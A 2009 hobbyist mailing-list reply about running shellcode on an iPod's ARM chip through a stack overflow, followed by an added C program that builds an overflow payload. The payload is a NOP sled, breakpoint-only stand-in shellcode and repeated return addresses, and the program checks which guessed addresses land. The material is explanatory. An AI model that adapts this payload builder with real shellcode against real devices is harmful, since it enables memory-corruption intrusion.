2009/2/17, Bahattin TOZYILMAZ <[email protected]>:
> Can we code addresses indirectly, create it on a register then use it?
> It is easy on an x86 but, can it be done on an ARM?

Yes, we can, but not to redirect the execution flow to the shellcode.

> And another question, how will we trigger the shell code?

If it is a stack-based overflow and if the stack isn't marked as
non-exec, we write the shellcode address (more or less, but we have a
small range of valid addresses (the NOPs)) on the stack, overwriting
some return address of some function with it.
(At least this is what I understand from the info given by The Seven
in the previous email.) In this way, after an LDR of PC from the stack,
instead of the instruction after the function call we'll have our
shellcode.

Also, things like return-to-libc don't seem to be feasible on the
iPod... at least with a black-box approach.
But we should just try.

_______________________________________________
Linux4nano-dev mailing list
[email protected]
https://mail.gna.org/listinfo/linux4nano-dev
http://www.linux4nano.org
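As an added worked example (this is not code from this thread or from the linux4nano project), the following C program lays out an overflow payload of the shape the message above describes for a little-endian ARM target with an executable stack: a sled of ARM-state NOPs, the shellcode, and the chosen address repeated over the slot that the function epilogue reloads into PC. It then checks which guessed addresses actually land in the sled. The point it makes beyond the prose is the ARM-specific caveat: every piece is 4 bytes wide, so a guess that is off by one or two bytes misses, unlike a byte-granular x86 0x90 sled. The buffer offset, the slot offset, the stack address and the stand-in shellcode bytes are all hypothetical, and the buffer is assumed to start word-aligned.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not code from the post. Payload shape on the stack:
 *   [ NOP sled ][ shellcode ][ return address, repeated to the end ]
 * All offsets are relative to the start of the overflowed buffer. */

#define ARM_NOP_WORD 0xE1A00000u   /* mov r0, r0: the usual ARM-state NOP */
#define DEMO_BUF_ADDR 0xBEFFF000u  /* hypothetical address of the buffer */

/* Constructed stand-in for shellcode: four ARM `bkpt #0` words (ARMv5T+),
 * so nothing useful would run if it were ever executed. */
static const uint8_t STUB[16] = {
    0x70, 0x00, 0x20, 0xE1, 0x70, 0x00, 0x20, 0xE1,
    0x70, 0x00, 0x20, 0xE1, 0x70, 0x00, 0x20, 0xE1 };

typedef struct {
    uint8_t buf[256];   /* payload bytes */
    size_t  len;        /* total payload length */
    size_t  sled_len;   /* NOP sled occupies [0, sled_len) */
    size_t  shell_off;  /* shellcode starts here (== sled_len) */
    size_t  shell_len;
    size_t  ret_off;    /* offset of the overwritten saved return address */
} payload_t;

static void put_le32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* ret_off is the distance from the buffer to the slot the epilogue loads
 * into PC (the saved LR). Everything before the shellcode becomes sled.
 * Returns 0 on success, -1 if the pieces do not fit or are misaligned. */
int build_payload(payload_t *p, size_t total_len, size_t ret_off,
                  const uint8_t *shellcode, size_t shell_len, uint32_t ret)
{
    if (total_len > sizeof p->buf || ret_off + 4 > total_len) return -1;
    if (shell_len > ret_off) return -1;
    /* ARM instructions are 4 bytes: keep sled, shellcode and slots aligned */
    if (shell_len % 4 || ret_off % 4 || total_len % 4) return -1;

    memset(p, 0, sizeof *p);
    p->len = total_len;
    p->ret_off = ret_off;
    p->shell_len = shell_len;
    p->shell_off = ret_off - shell_len;
    p->sled_len = p->shell_off;

    for (size_t i = 0; i < p->sled_len; i += 4)
        put_le32(p->buf + i, ARM_NOP_WORD);
    memcpy(p->buf + p->shell_off, shellcode, shell_len);
    /* repeat the address so the slot is hit even if ret_off is a bit off */
    for (size_t i = ret_off; i < total_len; i += 4)
        put_le32(p->buf + i, ret);
    return 0;
}

/* Does a guessed return address land on a sled word or on the first
 * shellcode instruction? Conservative: require word alignment rather
 * than rely on how a given core treats bits [1:0] of a value loaded
 * into PC. Assumes buf_addr itself is word-aligned. */
int ret_lands_in_sled(const payload_t *p, uint32_t buf_addr, uint32_t ret)
{
    if (ret < buf_addr) return 0;
    uint32_t off = ret - buf_addr;
    if (off & 3u) return 0;
    return off <= p->shell_off;
}

/* The "small range of valid addresses" from the post, counted. */
size_t valid_address_count(const payload_t *p)
{
    return p->sled_len / 4 + 1;
}

/* Demo payload: 128-byte overflow, saved LR assumed 96 bytes in. */
const payload_t *demo_payload(void)
{
    static payload_t p;
    static int built = 0, ok = 0;
    if (!built) {
        ok = build_payload(&p, 128, 96, STUB, sizeof STUB,
                           DEMO_BUF_ADDR + 0x20) == 0;
        built = 1;
    }
    return ok ? &p : NULL;
}

/* Helper for probing the fit/alignment checks with the stub shellcode. */
int demo_build_status(size_t total_len, size_t ret_off)
{
    payload_t scratch;
    return build_payload(&scratch, total_len, ret_off, STUB, sizeof STUB, 0);
}

int main(void)
{
    const payload_t *p = demo_payload();
    if (!p) return 1;
    printf("sled %zu bytes, shellcode at +%zu, slot at +%zu, %zu usable addresses\n",
           p->sled_len, p->shell_off, p->ret_off, valid_address_count(p));
    printf("0x%08X lands: %d\n", DEMO_BUF_ADDR + 0x20,
           ret_lands_in_sled(p, DEMO_BUF_ADDR, DEMO_BUF_ADDR + 0x20));
    printf("0x%08X lands: %d (off by two bytes)\n", DEMO_BUF_ADDR + 0x22,
           ret_lands_in_sled(p, DEMO_BUF_ADDR, DEMO_BUF_ADDR + 0x22));
    return 0;
}
```

The sled gives 21 addresses that work out of the 128 bytes written, and only word-aligned ones; a guess that is right about the region but wrong in its low two bits still fails, which is the check worth doing before spending time guessing stack addresses on the device.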